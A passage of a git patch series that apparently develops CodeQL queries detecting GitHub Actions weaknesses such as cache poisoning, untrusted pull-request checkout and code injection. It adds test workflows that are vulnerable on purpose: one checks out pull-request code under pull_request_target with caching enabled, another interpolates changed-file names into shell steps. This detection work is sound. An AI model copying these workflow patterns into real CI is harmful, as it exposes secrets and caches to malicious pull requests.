they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. - -## Example - -In this example, the Actions workflow uses an unpinned version. - -```yaml -name: "Unpinned Action Example" - -jobs: - build: - steps: - - name: Checkout repository - uses: actions-third-party-mirror/checkout@v3 - - - run: | - ./build.sh -``` - -The Action is pinned in the example below. - -```yaml -name: "Pinned Action Example" - -jobs: - build: - steps: - - name: Checkout repository - uses: actions-mirror-third-party/checkout@ac593985615ec2ede58e132d2e21d2b1cbd6127c - - - run: | - ./build.sh -``` - -## References - -- GitHub: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions) -- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html). diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutError.md b/ql/src/Security/CWE-829/UntrustedCheckoutError.md deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.md b/ql/src/Security/CWE-829/UntrustedCheckoutWarning.md deleted file mode 100644 index e69de29bb2d1..000000000000 From 2359e2de90d6a7adafca2ec16dfc849e3e0a7fe7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 17:24:43 +0200 Subject: [PATCH 233/707] Clean query --- ql/src/Security/CWE-349/CachePoisoning.ql | 27 +++++++++---------- .../Security/CWE-349/CachePoisoning.expected | 6 ++--- 2 files changed, 16 insertions(+), 17 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index b3a9267703f8..ac51e58ff4b0 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -15,22 +15,21 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery -from Workflow w, PRHeadCheckoutStep checkout, LocalJob j +from LocalJob j where + // The workflow runs in the context of the default branch // TODO: (require to collect trigger types) // - add push to default branch? // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch - w.hasTriggerEvent([ - "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", "gollum", - "issue_comment", "issues", "label", "milestone", "project", "project_card", "project_column", - "public", "pull_request_comment", "pull_request_target", "repository_dispatch", "schedule", - "watch", "workflow_run" - ]) and - // Workflow is privileged - w.isPrivileged() and - // The workflow checkouts untrusted code from a pull request - j = w.getAJob() and - j.getAStep() = checkout and - // The checkout step is followed by a cache writing step + j.getEnclosingWorkflow() + .hasTriggerEvent([ + "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", + "gollum", "issue_comment", "issues", "label", "milestone", "project", "project_card", + "project_column", "public", "pull_request_comment", "pull_request_target", + "repository_dispatch", "schedule", "watch", "workflow_run" + ]) and + // The job checkouts untrusted code from a pull request + j.getAStep() instanceof PRHeadCheckoutStep and + // The job writes to the cache j.getAStep() instanceof CacheWritingStep -select checkout, "Potential cache poisoning on privileged workflow." +select j.getAStep().(CacheWritingStep), "Potential cache poisoning on privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index e767e2f86222..b791a440a6ef 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,3 +1,3 @@ -| .github/workflows/test1.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test2.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test3.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test1.yml:17:9:21:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test2.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test3.yml:12:9:20:6 | Uses Step | Potential cache poisoning on privileged workflow. | From f6b1daa59c7e872797c1486486258d23c7a3f2db Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 18:26:58 +0200 Subject: [PATCH 234/707] Improve query --- .../actions/security/CachePoisoningQuery.qll | 11 +++++++++-- ql/src/Security/CWE-349/CachePoisoning.ql | 16 ++++++++++++---- .../CWE-349/.github/workflows/test5.yml | 17 +++++++++++++++++ .../CWE-349/.github/workflows/test6.yml | 17 +++++++++++++++++ .../CWE-349/.github/workflows/test7.yml | 16 ++++++++++++++++ .../Security/CWE-349/CachePoisoning.expected | 2 ++ 6 files changed, 73 insertions(+), 6 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index a9a28227957c..6668ef9777d6 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -21,7 +21,14 @@ class SetupJavaUsesStep extends CacheWritingStep, UsesStep { } class SetupGoUsesStep extends CacheWritingStep, UsesStep { - SetupGoUsesStep() { this.getCallee() = "actions/setup-go" } + SetupGoUsesStep() { + this.getCallee() = "actions/setup-go" and + ( + not exists(this.getArgument("cache")) + or + this.getArgument("cache") = "true" + ) + } } class SetupNodeUsesStep extends CacheWritingStep, UsesStep { @@ -48,7 +55,7 @@ class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { SetupDotnetUsesStep() { this.getCallee() = "actions/setup-dotnet" and ( - exists(this.getArgument("cache")) or + this.getArgument("cache") = "true" or exists(this.getArgument("cache-dependency-path")) ) } diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index ac51e58ff4b0..e0d59a02ab49 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -14,8 +14,9 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery +import codeql.actions.security.PoisonableSteps -from LocalJob j +from LocalJob j, PRHeadCheckoutStep checkout where // The workflow runs in the context of the default branch // TODO: (require to collect trigger types) @@ -29,7 +30,14 @@ where "repository_dispatch", "schedule", "watch", "workflow_run" ]) and // The job checkouts untrusted code from a pull request - j.getAStep() instanceof PRHeadCheckoutStep and - // The job writes to the cache - j.getAStep() instanceof CacheWritingStep + j.getAStep() = checkout and + ( + // The job writes to the cache + // (No need to follow the checkout step as the cache writing is normally done after the job completes) + j.getAStep() instanceof CacheWritingStep + or + // The job executes checked-out code + // (The cache specific token can be leaked even for non-privileged workflows) + checkout.getAFollowingStep() instanceof PoisonableStep + ) select j.getAStep().(CacheWritingStep), "Potential cache poisoning on privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml new file mode 100644 index 000000000000..9bc6cc980562 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml @@ -0,0 +1,17 @@ +name: Cache Poisoning + +on: pull_request_target + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/setup-go@v2 + with: + go-version-file: 'go.mod' + cache: false + - run: do some go stuff + diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml new file mode 100644 index 000000000000..b5ef835210bc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml @@ -0,0 +1,17 @@ +name: Cache Poisoning + +on: pull_request_target + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/setup-go@v2 + with: + go-version-file: 'go.mod' + cache: true + - run: do some go stuff + diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml new file mode 100644 index 000000000000..d0ff8c180fe2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml @@ -0,0 +1,16 @@ +name: Cache Poisoning + +on: pull_request_target + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/setup-go@v2 + with: + go-version-file: 'go.mod' + - run: do some go stuff + diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index b791a440a6ef..6e0030ad3832 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,3 +1,5 @@ | .github/workflows/test1.yml:17:9:21:6 | Uses Step | Potential cache poisoning on privileged workflow. | | .github/workflows/test2.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. | | .github/workflows/test3.yml:12:9:20:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test6.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test7.yml:12:9:15:6 | Uses Step | Potential cache poisoning on privileged workflow. | From 373e0a278af4bbe7551a271ded09c6e72705ac62 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 18:36:46 +0200 Subject: [PATCH 235/707] Rename untrusted checkout queries --- ...dCheckoutError.ql => PrivilegedUntrustedCheckoutCritical.ql} | 2 +- ...tedCheckoutWarning.ql => PrivilegedUntrustedCheckoutHigh.ql} | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) rename ql/src/Security/CWE-829/{UntrustedCheckoutError.ql => PrivilegedUntrustedCheckoutCritical.ql} (95%) rename ql/src/Security/CWE-829/{UntrustedCheckoutWarning.ql => PrivilegedUntrustedCheckoutHigh.ql} (95%) diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutError.ql b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql similarity index 95% rename from ql/src/Security/CWE-829/UntrustedCheckoutError.ql rename to ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql index 604acf71cc7b..5c0528c45518 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutError.ql +++ b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql @@ -7,7 +7,7 @@ * @problem.severity error * @precision high * @security-severity 9.3 - * @id actions/untrusted-checkout + * @id actions/privileged-untrusted-checkout/critical * @tags actions * security * external/cwe/cwe-829 diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql similarity index 95% rename from ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql rename to ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql index d8dfd69ad28e..e45075552ab2 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql +++ b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql @@ -7,7 +7,7 @@ * @problem.severity warning * @precision medium * @security-severity 5.3 - * @id actions/untrusted-checkout + * @id actions/privileged-untrusted-checkout/high * @tags actions * security * external/cwe/cwe-829 From 254664d2747daf4fc1910b33c5cd3cdf2b8627cf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 18:39:15 +0200 Subject: [PATCH 236/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 380cfdbd8583..f07d6c40046c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.20 +version: 0.0.21 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c5a94e35d4be..13f053a40da4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.20 +version: 0.0.21 groups: - actions - queries From c3c6410a73033d86e2ede33a3cec958d19f29609 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 20:01:48 +0200 Subject: [PATCH 237/707] Update action.yml --- .github/action/dist/index.js | 11 +++-------- .github/action/src/codeql.ts | 13 +++---------- action.yml | 14 +++----------- 3 files changed, 9 insertions(+), 29 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 4a60299ef0fe..0911555e292d 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28706,14 +28706,9 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { "--output", codeql_output, ]; - const extPackPath = process.env["EXTPACK_PATH"]; - const extPackName = process.env["EXTPACK_NAME"]; - if (extPackPath !== undefined && - extPackName !== undefined && - extPackPath !== "" && - extPackName !== "") { - cmd.push("--additional-packs", extPackPath); - cmd.push("--extension-packs", extPackName); + const useWorkflowModels = process.env["USE_WORKFLOW_MODELS"]; + if (useWorkflowModels !== undefined && useWorkflowModels == "true") { + cmd.push("--extension-packs", "local/workflow-models"); } // remote pack or local pack if (codeql.pack.startsWith("githubsecuritylab/")) { diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 842af1c8b177..ea1d731c9357 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -147,16 +147,9 @@ export async function codeqlDatabaseAnalyze( codeql_output, ]; - const extPackPath = process.env["EXTPACK_PATH"]; - const extPackName = process.env["EXTPACK_NAME"]; - if ( - extPackPath !== undefined && - extPackName !== undefined && - extPackPath !== "" && - extPackName !== "" - ) { - cmd.push("--additional-packs", extPackPath); - cmd.push("--extension-packs", extPackName); + const useWorkflowModels = process.env["USE_WORKFLOW_MODELS"]; + if (useWorkflowModels !== undefined && useWorkflowModels == "true") { + cmd.push("--extension-packs", "local/workflow-models"); } // remote pack or local pack diff --git a/action.yml b/action.yml index 35c423e103df..24453e893ee2 100644 --- a/action.yml +++ b/action.yml @@ -14,12 +14,6 @@ inputs: suite: description: "CodeQL Suite to run" default: "actions-code-scanning" - workflow-extpack-path: - description: "Path to Workflow extpack" - required: false - workflow-extpack-name: - description: "Name of the Workflow extpack" - required: false runs: using: 'composite' @@ -27,14 +21,14 @@ runs: - name: extpack contents shell: bash env: - EXTPACK_PATH: ${{ inputs.workflow-extpack-path }} - EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} + EXTPACK_PATH: /home/runner/.codeql/packages/local/workflow-models/0.0.1 + EXTPACK_NAME: local/workflow-models run: | echo "##[group] Workflow Models" if [ -f $EXTPACK_PATH/models.yml ]; then cat $EXTPACK_PATH/models.yml; fi echo "##[endgroup]" echo "##[group] QLPack" - if [ -f $EXTPACK_PATH/qlpack.yml ]; then cat $EXTPACK_PATH/qlpack.yml; fi + if [ -f $EXTPACK_PATH/codeql-pack.yml ]; then cat $EXTPACK_PATH/codeql-pack.yml; echo "USE_WORKFLOW_MODELS=true" >> $GITHUB_ENV; fi echo "##[endgroup]" - name: Scan workflows @@ -45,7 +39,5 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} - EXTPACK_PATH: ${{ inputs.workflow-extpack-path }} - EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 0ea34dfb528c914602c8cdf2adc35768a725a786 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 22:11:43 +0200 Subject: [PATCH 238/707] Update action.yml --- action.yml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/action.yml b/action.yml index 24453e893ee2..151c909fb8be 100644 --- a/action.yml +++ b/action.yml @@ -14,12 +14,19 @@ inputs: suite: description: "CodeQL Suite to run" default: "actions-code-scanning" + packs: + description: >- + Comma-separated list of packs to run. Reference a pack in the format `scope/name[@version]`. If `version` is not + specified, then the latest version of the pack is used. By default, this overrides the same setting in a + configuration file; prefix with "+" to use both sets of packs. + required: false runs: using: 'composite' steps: - name: extpack contents shell: bash + if: inputs.packs env: EXTPACK_PATH: /home/runner/.codeql/packages/local/workflow-models/0.0.1 EXTPACK_NAME: local/workflow-models @@ -28,7 +35,7 @@ runs: if [ -f $EXTPACK_PATH/models.yml ]; then cat $EXTPACK_PATH/models.yml; fi echo "##[endgroup]" echo "##[group] QLPack" - if [ -f $EXTPACK_PATH/codeql-pack.yml ]; then cat $EXTPACK_PATH/codeql-pack.yml; echo "USE_WORKFLOW_MODELS=true" >> $GITHUB_ENV; fi + if [ -f $EXTPACK_PATH/codeql-pack.yml ]; then cat $EXTPACK_PATH/codeql-pack.yml; fi echo "##[endgroup]" - name: Scan workflows @@ -39,5 +46,6 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} + INPUT_PACKS: ${{ inputs.packs }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 1ddfbb05f36adcb32f4415a9a7b9a145edfe2094 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 22:19:02 +0200 Subject: [PATCH 239/707] Update actions fragment --- .github/action/dist/index.js | 6 +++--- .github/action/src/codeql.ts | 9 ++++++--- 2 files changed, 9 insertions(+), 6 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 0911555e292d..8ff1e7759d27 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28610,6 +28610,7 @@ async function newCodeQL() { suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), + packs: core.getInput("packs").length > 0 ? core.getInput("packs") : undefined, }; } exports.newCodeQL = newCodeQL; @@ -28706,9 +28707,8 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { "--output", codeql_output, ]; - const useWorkflowModels = process.env["USE_WORKFLOW_MODELS"]; - if (useWorkflowModels !== undefined && useWorkflowModels == "true") { - cmd.push("--extension-packs", "local/workflow-models"); + if (codeql.packs !== undefined) { + cmd.push("--extension-packs", codeql.packs); } // remote pack or local pack if (codeql.pack.startsWith("githubsecuritylab/")) { diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index ea1d731c9357..76eacd6eb67e 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -18,6 +18,8 @@ export interface CodeQLConfig { source_root?: string; // The output file for the SARIF file. output?: string; + // Extension CodeQL packs to use for analysis. + packs: string | undefined; } export async function newCodeQL(): Promise { @@ -28,6 +30,8 @@ export async function newCodeQL(): Promise { suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), + packs: + core.getInput("packs").length > 0 ? core.getInput("packs") : undefined, }; } @@ -147,9 +151,8 @@ export async function codeqlDatabaseAnalyze( codeql_output, ]; - const useWorkflowModels = process.env["USE_WORKFLOW_MODELS"]; - if (useWorkflowModels !== undefined && useWorkflowModels == "true") { - cmd.push("--extension-packs", "local/workflow-models"); + if (codeql.packs !== undefined) { + cmd.push("--extension-packs", codeql.packs); } // remote pack or local pack From ddf4bb194ef1562a45ad17d5a1066f88021f23c3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 23:32:06 +0200 Subject: [PATCH 240/707] Fix incorrect source for dorny path filters --- .../codeql/actions/dataflow/FlowSources.qll | 17 ++++- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 20 ++++++ ql/lib/ext/dorny_paths-filter.model.yml | 6 -- ql/test/library-tests/test.expected | 1 - .../CWE-094/.github/workflows/test2.yml | 64 +++++++++++++++++++ .../Security/CWE-094/CodeInjection.expected | 6 ++ .../CWE-094/PrivilegedCodeInjection.expected | 8 +++ 7 files changed, 114 insertions(+), 8 deletions(-) delete mode 100644 ql/lib/ext/dorny_paths-filter.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 580fb1d25ab1..db111b9e1900 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -252,10 +252,25 @@ class CompositeActionInputSource extends RemoteFlowSource { } /** - * A downloadeded artifact. + * A downloaded artifact. */ private class ArtifactSource extends RemoteFlowSource { ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "artifact" } } + +/** + * A list of file names returned by dorny/paths-filter. + */ +private class DornyPathsFilterSource extends RemoteFlowSource { + DornyPathsFilterSource() { + exists(UsesStep u | + u.getCallee() = "dorny/paths-filter" and + u.getArgument("list-files") = ["csv", "json"] and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "filename" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index b24f9484a80e..32c329d8c67c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -124,3 +124,23 @@ class ArtifactDownloadToUseTaintStep extends AdditionalTaintStep { artifactDownloadToUseStep(node1, node2) } } + +/** + * A read of the _files field of the dorny/paths-filter action. + */ +predicate dornyPathsFilterTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(UsesStep u, StepsExpression o | + u.getCallee() = "dorny/paths-filter" and + u.getArgument("list-files") = ["csv", "json"] and + u = pred.asExpr() and + o.getStepId() = u.getId() and + o.getFieldName().matches("%_files") and + succ.asExpr() = o + ) +} + +class DornyPathsFilterTaintStep extends AdditionalTaintStep { + override predicate step(DataFlow::Node node1, DataFlow::Node node2) { + dornyPathsFilterTaintStep(node1, node2) + } +} diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml deleted file mode 100644 index 79621a6a30c6..000000000000 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ /dev/null @@ -1,6 +0,0 @@ -extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sourceModel - data: - - ["dorny/paths-filter", "*", "output.changes", "filename", "manual"] diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 5bd009b31b0f..d7f944c5a3dc 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -438,7 +438,6 @@ sources | amannn/action-semantic-pull-request | * | output.error_message | text | manual | | cypress-io/github-action | * | env.GH_BRANCH | branch | manual | | dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | -| dorny/paths-filter | * | output.changes | filename | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | | googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml new file mode 100644 index 000000000000..03ee63fe9cf4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml @@ -0,0 +1,64 @@ +name: List files + +on: + pull_request_target: + types: [ opened, synchronize, workflow_dispatch] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + runs-on: ubuntu-latest + env: + GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}" + steps: + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed + with: + list-files: json + filters: | + locale: + - '*.xml' + - name: Changed files 1 + run: | + echo changed: ${{ steps.changed.outputs.locale_files }} + echo changed: ${{ steps.changed.outputs.changes }} + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed2 + with: + list-files: csv + filters: | + locale: + - '*.xml' + - name: Changed files 2 + run: | + echo changed:${{ steps.changed2.outputs.locale_files }} + echo changed: ${{ steps.changed2.outputs.changes }} + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed3 + with: + list-files: shell + filters: | + locale: + - '*.xml' + - name: Changed files 3 + run: | + echo changed:${{ steps.changed3.outputs.locale_files }} + echo changed: ${{ steps.changed3.outputs.changes }} + - name: Check for relevant changes + uses: dorny/paths-filter@v3 + id: changed4 + with: + list-files: escape + filters: | + locale: + - '*.xml' + - name: Changed files 4 + run: | + echo changed:${{ steps.changed4.outputs.locale_files }} + echo changed: ${{ steps.changed4.outputs.changes }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 50cb0c40d24a..e220d368b20b 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -55,6 +55,8 @@ edges | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | @@ -210,6 +212,10 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | semmle.label | Uses Step: changed | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 9068ef92715c..1c4ab8a61cf4 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -55,6 +55,8 @@ edges | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | @@ -210,6 